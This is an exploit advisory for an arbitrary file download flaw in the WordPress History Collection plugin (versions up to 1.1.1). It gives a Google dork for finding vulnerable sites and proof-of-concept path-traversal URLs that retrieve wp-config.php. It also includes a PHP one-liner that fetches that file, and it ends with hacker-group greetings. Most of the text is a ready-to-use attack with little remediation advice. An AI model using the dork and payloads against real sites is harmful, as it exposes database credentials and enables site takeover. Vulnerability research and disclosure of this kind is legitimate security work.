# Exploit Title: WordPress History Collection <=1.1.1 Arbitraty File
Download
# Google Dork: inurl:plugins/history-collection# Date: 10/06/2015# Exploit Author: Kuroi'SH# Software Link: https://wordpress.org/plugins/history-collection/# Version: <=1.1.1# Tested on: Linux
I-Description:
Wordpress history collection plugin contains a file called download.php
which isnot filtering the GET input, it then uses this get input value to
force the download of a file.(download.php, line 44):
header("Content-Disposition: attachment;
filename=\"".basename($filename)."\";");2:Proof of concept:
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=yourfile
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php
php -r "echo @file_get_contents('
http://localhost/simple-fields/wordpress/wp-content/plugins/history-collection/download.php?var=../../../wp-config.php');"
Greetz:
Moh Ooasiic, Virus Os, Black Sniper, T3N38R15, Green Ghost, n37_worm,
MuhmadEmad, redsm0ke
By Kuroi'SH
